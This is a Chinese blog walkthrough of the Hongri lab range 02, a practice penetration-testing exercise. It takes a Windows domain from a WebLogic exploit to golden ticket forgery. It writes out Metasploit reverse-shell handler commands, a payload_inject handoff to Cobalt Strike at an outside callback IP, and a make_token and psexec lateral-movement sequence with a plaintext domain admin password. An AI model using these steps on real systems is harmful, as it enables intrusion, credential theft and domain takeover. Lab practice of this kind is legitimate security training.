红日靶场02
1. 首先发现 weblogic 漏洞,直接打开工具一把梭,上传内存马,哥斯拉连接


2. 打开 cs 设置一个监听器,vps 为服务器 ip

3.msf 开启监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 11111
lport => 11111
msf5 exploit(multi/handler) > run
4. 哥斯拉一键反弹 shell

5. 直接命令派生到 cs
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 117.50.196.44
set lport 81
set session 1
run
//session会变
6.cs 成功上线

7. 提权,右键上线目标

8. 成功新上线 system 权限

9. 抓取远程服务密码

10. 成功抓取到 DC 域的账号密码

11. 直接登陆

12. 横向移动,直接在 cs 操作

rev2self
make_token delay.com\Administrator Aa@123456
jump psexec DC 1
13. 直接横向成功

14. 黄金票据的伪造
(1) hashdump 获取 hash 数

(2) 获取域 SID

(3) 右键添加黄金票据

(4) 直接输入 SID,Hash

(5) 成功创建

### 参考:
https://blog.csdn.net/qq_45780190/article/details/123156086
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 月光倾泻与山海,你跌进我的梦里!